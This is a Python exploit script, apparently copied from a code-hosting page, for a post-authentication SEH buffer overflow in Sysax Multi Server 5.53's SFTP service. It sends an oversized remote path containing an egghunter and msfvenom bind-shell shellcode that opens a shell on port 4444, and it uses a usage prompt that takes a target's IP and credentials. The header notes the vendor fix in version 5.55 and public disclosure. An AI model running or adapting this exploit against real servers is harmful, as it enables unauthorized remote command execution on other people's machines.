78 lines
No EOL
3.7 KiB
Python
Executable file
78 lines
No EOL
3.7 KiB
Python
Executable file
#!/usr/bin/python
|
|
##########################################################################################################
|
|
#Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
|
|
#Author: Craig Freyman (@cd1zz)
|
|
#Tested on: XP SP3 32bit
|
|
#Software Versions Tested: 5.53
|
|
#Date Discovered: Febrary 22, 2012
|
|
#Vendor Contacted: Febrary 23, 2012
|
|
#Vendor Response: February 27, 2012
|
|
#Vendor Fix: Version 5.55
|
|
#Notes: Offset based on home path length. This exploit works for C:\AAAAAAAAAAAAAAAA
|
|
#Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
|
|
##########################################################################################################
|
|
import paramiko,os,sys
|
|
|
|
if len(sys.argv) != 5:
|
|
print "[+] Usage: ./filename <Target IP> <Port> <User> <Password>"
|
|
sys.exit(1)
|
|
|
|
host = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
username = sys.argv[3]
|
|
password = sys.argv[4]
|
|
|
|
transport = paramiko.Transport((host, port))
|
|
transport.connect(username = username, password = password)
|
|
sftp = paramiko.SFTPClient.from_transport(transport)
|
|
|
|
# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "\x00" -e x86/shikata_ga_nai
|
|
shell = ("DNWPDNWP"
|
|
"\xdb\xd9\xba\xf9\x77\x28\x1b\xd9\x74\x24\xf4\x5e\x29\xc9"
|
|
"\xb1\x56\x31\x56\x18\x83\xee\xfc\x03\x56\xed\x95\xdd\xe7"
|
|
"\xe5\xd3\x1e\x18\xf5\x83\x97\xfd\xc4\x91\xcc\x76\x74\x26"
|
|
"\x86\xdb\x74\xcd\xca\xcf\x0f\xa3\xc2\xe0\xb8\x0e\x35\xce"
|
|
"\x39\xbf\xf9\x9c\xf9\xa1\x85\xde\x2d\x02\xb7\x10\x20\x43"
|
|
"\xf0\x4d\xca\x11\xa9\x1a\x78\x86\xde\x5f\x40\xa7\x30\xd4"
|
|
"\xf8\xdf\x35\x2b\x8c\x55\x37\x7c\x3c\xe1\x7f\x64\x37\xad"
|
|
"\x5f\x95\x94\xad\x9c\xdc\x91\x06\x56\xdf\x73\x57\x97\xd1"
|
|
"\xbb\x34\xa6\xdd\x36\x44\xee\xda\xa8\x33\x04\x19\x55\x44"
|
|
"\xdf\x63\x81\xc1\xc2\xc4\x42\x71\x27\xf4\x87\xe4\xac\xfa"
|
|
"\x6c\x62\xea\x1e\x73\xa7\x80\x1b\xf8\x46\x47\xaa\xba\x6c"
|
|
"\x43\xf6\x19\x0c\xd2\x52\xcc\x31\x04\x3a\xb1\x97\x4e\xa9"
|
|
"\xa6\xae\x0c\xa6\x0b\x9d\xae\x36\x03\x96\xdd\x04\x8c\x0c"
|
|
"\x4a\x25\x45\x8b\x8d\x4a\x7c\x6b\x01\xb5\x7e\x8c\x0b\x72"
|
|
"\x2a\xdc\x23\x53\x52\xb7\xb3\x5c\x87\x18\xe4\xf2\x77\xd9"
|
|
"\x54\xb3\x27\xb1\xbe\x3c\x18\xa1\xc0\x96\x2f\xe5\x0e\xc2"
|
|
"\x7c\x82\x72\xf4\x93\x0e\xfa\x12\xf9\xbe\xaa\x8d\x95\x7c"
|
|
"\x89\x05\x02\x7e\xfb\x39\x9b\xe8\xb3\x57\x1b\x16\x44\x72"
|
|
"\x08\xbb\xec\x15\xda\xd7\x28\x07\xdd\xfd\x18\x4e\xe6\x96"
|
|
"\xd3\x3e\xa5\x07\xe3\x6a\x5d\xab\x76\xf1\x9d\xa2\x6a\xae"
|
|
"\xca\xe3\x5d\xa7\x9e\x19\xc7\x11\xbc\xe3\x91\x5a\x04\x38"
|
|
"\x62\x64\x85\xcd\xde\x42\x95\x0b\xde\xce\xc1\xc3\x89\x98"
|
|
"\xbf\xa5\x63\x6b\x69\x7c\xdf\x25\xfd\xf9\x13\xf6\x7b\x06"
|
|
"\x7e\x80\x63\xb7\xd7\xd5\x9c\x78\xb0\xd1\xe5\x64\x20\x1d"
|
|
"\x3c\x2d\x50\x54\x1c\x04\xf9\x31\xf5\x14\x64\xc2\x20\x5a"
|
|
"\x91\x41\xc0\x23\x66\x59\xa1\x26\x22\xdd\x5a\x5b\x3b\x88"
|
|
"\x5c\xc8\x3c\x99")
|
|
|
|
egghunter = (
|
|
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
|
|
"\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x4e\x57\x50"
|
|
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
|
|
|
|
nseh = "\x90\x90\xeb\x08"
|
|
junk = "A" * 256
|
|
padding = "B" * (256 -len(junk) - len(shell))
|
|
seh = "\xA1\x47\x92\x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected ***
|
|
remotepath = junk + nseh + seh + "\x90" * 10 + egghunter + "\x90" * 1000 + shell + "\x90" * 100
|
|
localpath = '/tmp/system.log'
|
|
print "============================================================================"
|
|
print " Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter) "
|
|
print " by cd1zz "
|
|
print " www.pwnag3.com "
|
|
print " Launching exploit against " + host + " on port " + str(port) + " for XP"
|
|
print "============================================================================"
|
|
sftp.get(remotepath, localpath)
|
|
sftp.close()
|
|
transport.close() |